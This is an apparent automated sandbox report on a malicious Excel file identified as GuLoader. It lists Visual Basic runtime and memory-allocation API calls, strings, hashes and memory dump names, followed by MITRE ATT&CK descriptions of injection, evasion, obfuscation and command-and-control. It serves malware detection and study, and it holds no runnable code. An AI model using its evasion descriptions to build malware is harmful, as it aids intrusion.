Uniqueness

Uniqueness Score: -1.00%

Function 00419650, Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004196C0
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 004196D7
__vbaVarMove.MSVBVM60 ref: 00419704
__vbaVarMove.MSVBVM60 ref: 00419730
__vbaVarMove.MSVBVM60 ref: 0041974D
__vbaVarMove.MSVBVM60 ref: 00419776
#665.MSVBVM60(?,3F800000,?), ref: 00419785
__vbaErase.MSVBVM60(00000000,?), ref: 00419790
__vbaVarTstNe.MSVBVM60(?,?), ref: 004197B1
__vbaFreeVar.MSVBVM60 ref: 004197BD
#594.MSVBVM60(?), ref: 004197DE
__vbaFreeVar.MSVBVM60 ref: 004197E7
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 004197FF
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000014), ref: 00419824
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D920,00000130), ref: 0041984E
__vbaStrMove.MSVBVM60 ref: 0041985D
__vbaFreeObj.MSVBVM60 ref: 00419866
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 0041987E
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000038,?,?,?,?,?,?,?,0000000A), ref: 004198EF
__vbaVar2Vec.MSVBVM60(?,0000000A,?,?,?,?,?,?,?,0000000A), ref: 004198FD
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,0000000A), ref: 0041990B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 00419914
__vbaAryDestruct.MSVBVM60(00000000,?,0041997B), ref: 00419964
__vbaFreeStr.MSVBVM60 ref: 00419973
__vbaFreeStr.MSVBVM60 ref: 00419978

Strings

{, xrefs: 004198C7
AFSNRINGEN, xrefs: 004198A6

Memory Dump Source

Source File: 00000006.00000002.643675243.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.643669376.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.643687737.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.643694168.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$CheckHresult$New2$#594#665CopyDestructEraseRedimVar2
String ID: AFSNRINGEN${
API String ID: 3074978736-1400725761
Opcode ID: dda08d1f436b7b877df6eacd3e175313fd7be92d4a577dda4edeb8604fbbb6ab
Instruction ID: 7de8a1085875098cc0c2d7205fa6beaafbc7a10de7350cf50266dadb5656f05f
Opcode Fuzzy Hash: dda08d1f436b7b877df6eacd3e175313fd7be92d4a577dda4edeb8604fbbb6ab
Instruction Fuzzy Hash: C2A108B1D102189FDB04DFA8D998ADDBBB8FF48704F10816AF509AB260D7746985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00418B50, Relevance: 27.5, APIs: 18, Instructions: 478COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00418BC3
__vbaAryConstruct2.MSVBVM60(?,0040DB40,00000002), ref: 00418BD4
#610.MSVBVM60(?), ref: 00418BE4
#661.MSVBVM60(?,0040DB38,00000000,3FF00000,?), ref: 00418BF9
#610.MSVBVM60(?), ref: 00418C03
__vbaVarAdd.MSVBVM60(?,?,?,?), ref: 00418C2F
__vbaVarTstNe.MSVBVM60(00000000), ref: 00418C36
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00418C54
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 0041932C
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000014), ref: 00419357
__vbaHresultCheckObj.MSVBVM60(00000000,00006B16,0040D920,00000108), ref: 00419388
__vbaFreeObj.MSVBVM60 ref: 0041938D
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 004193A5
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000048), ref: 004193CF
__vbaStrMove.MSVBVM60 ref: 004193DA
__vbaFreeStr.MSVBVM60(00419449), ref: 00419429
__vbaFreeStr.MSVBVM60 ref: 0041942E
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00419442

Memory Dump Source

Source File: 00000006.00000002.643675243.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.643669376.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.643687737.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.643694168.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#610New2$#661Construct2CopyDestructListMove
String ID:
API String ID: 3190467145-0
Opcode ID: d80c69c9a449c755807535f662cbf24ebb6a6232587c7433aa6c8a1621f07a42
Instruction ID: f14bf8652d87f7b07a15794ad6d05a293ce1202932459b3876e561e61f5d1249
Opcode Fuzzy Hash: d80c69c9a449c755807535f662cbf24ebb6a6232587c7433aa6c8a1621f07a42
Instruction Fuzzy Hash: 25428334A102098BCB04CF98C595ADDF3B1FF48304F24D26AD9257B365E771A946CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00419470, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

#598.MSVBVM60 ref: 004194CB
__vbaVarDup.MSVBVM60 ref: 004194F3
#632.MSVBVM60(?,?,00000002,00000002), ref: 00419507
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041952C
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 00419543
#554.MSVBVM60 ref: 00419555
__vbaOnError.MSVBVM60(00000000), ref: 0041955C
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 00419574
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,0000004C), ref: 00419599
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D930,00000024), ref: 004195C7
__vbaStrMove.MSVBVM60 ref: 004195D6
__vbaFreeObj.MSVBVM60 ref: 004195DF
__vbaFreeStr.MSVBVM60(00419624), ref: 0041961D

Strings

Bageevnes4, xrefs: 004195AA
ANFLJNES, xrefs: 004195AF

Memory Dump Source

Source File: 00000006.00000002.643675243.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.643669376.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.643687737.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.643694168.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#554#598#632ErrorListMoveNew2
String ID: ANFLJNES$Bageevnes4
API String ID: 1363981936-648517204
Opcode ID: 36436c29ab5ecb999732f241f22c5a48e381be5673c9bf1ebab15d402f654acd
Instruction ID: 05e9d91b960223c4c106cbb86a6e0ad5eb6b539bd2f7e83dd263cf3cd94e4074
Opcode Fuzzy Hash: 36436c29ab5ecb999732f241f22c5a48e381be5673c9bf1ebab15d402f654acd
Instruction Fuzzy Hash: 27410DB1D00218AFCB10DF94DA49EDDBBB9FB48B00F20456AF505B72A0C7785A49CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00412250, Relevance: 16.6, APIs: 11, Instructions: 100COMMON

Download Yara Rule

APIs

#685.MSVBVM60 ref: 00412287
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412292
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DAD0,0000001C), ref: 004122B9
__vbaFreeObj.MSVBVM60 ref: 004122D5
#593.MSVBVM60(?), ref: 004122F6
__vbaFreeVar.MSVBVM60 ref: 00412301
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 00412319
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000014), ref: 0041233E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D920,000000B8), ref: 00412364
__vbaFreeObj.MSVBVM60 ref: 00412369
#570.MSVBVM60(00000035), ref: 00412371

Memory Dump Source

Source File: 00000006.00000002.643675243.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.643669376.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.643687737.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.643694168.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#570#593#685New2
String ID:
API String ID: 2374434628-0
Opcode ID: 15f3d862f9be89d0ed435ef42c59214fd559a3a233c7d1330a0793ab6dee040d
Instruction ID: 7b88caba5aed7376086efa3271df54d2c892d817fe9faccfd6f439c968c2a529
Opcode Fuzzy Hash: 15f3d862f9be89d0ed435ef42c59214fd559a3a233c7d1330a0793ab6dee040d
Instruction Fuzzy Hash: 623170B1900218AFCB10AFA0DD89EDEBBB8FF08700F24452AF506F71A0D7785595CB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 1184 Parent PID: 2228 vbc.exeCOMMON

Executed Functions

Function 001B5D81, Relevance: 1.7, APIs: 1, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26bcc2d233b5ecbe87dab273f1438cffb2df4171453c9607e18a20aa220c260a
Instruction ID: 6170fc3fd8858831b82c1f99666ab4ce426614149acb73f5ebd8fc95c9dc8852
Opcode Fuzzy Hash: 26bcc2d233b5ecbe87dab273f1438cffb2df4171453c9607e18a20aa220c260a
Instruction Fuzzy Hash: AA5189715053C98FDB24AF3198853DEBBA2EFAA384F18462EDC894F261D3314953DB45

Uniqueness

Uniqueness Score: -1.00%

Function 001B5CD5, Relevance: 1.6, APIs: 1, Instructions: 135memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 001B5EE3

Memory Dump Source

Source File: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5d6a74e9c8afe666f12b9c67195fca3c028e81f6ede070491286f41f846bf691
Instruction ID: 1dc2663fbbbe7f0710533b65b6f716f6d5ae24e8fd230e46f76364fefe770975
Opcode Fuzzy Hash: 5d6a74e9c8afe666f12b9c67195fca3c028e81f6ede070491286f41f846bf691
Instruction Fuzzy Hash: D05112755043888FEB249F66D891BFE7BB2FF69348F45012DEC8A9B261C7305A41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001B5D30, Relevance: 1.6, APIs: 1, Instructions: 126memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 001B5EE3

Memory Dump Source

Source File: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d68274eed913a694bdd9a71ea983bf719739f4fd33930397b4e88409eb99bb66
Instruction ID: ada168c7ece75b0b22352a428823d7f349ae549f31c7168b2ef954acb14a5101
Opcode Fuzzy Hash: d68274eed913a694bdd9a71ea983bf719739f4fd33930397b4e88409eb99bb66
Instruction Fuzzy Hash: CB4136715043898FEB689F65DC917FE7BE2EF69344F45012DEC8A9B2A1C7348A41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001B5E07, Relevance: 1.6, APIs: 1, Instructions: 98memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 001B5EE3

Memory Dump Source

Source File: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5bb7efc0a2b923009fb14114db2937215605f5aa1717740c424ea7c08808d9be
Instruction ID: bce7be90490bc1a701f8e7b468c5e836f38cd4e4be1515346d6f6039b433aa88
Opcode Fuzzy Hash: 5bb7efc0a2b923009fb14114db2937215605f5aa1717740c424ea7c08808d9be
Instruction Fuzzy Hash: 6231F2755043898FEB249F25DC91BFEBBB2EF69348F45012DEC8A8B261C7348A45CB44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2132 Parent PID: 596

General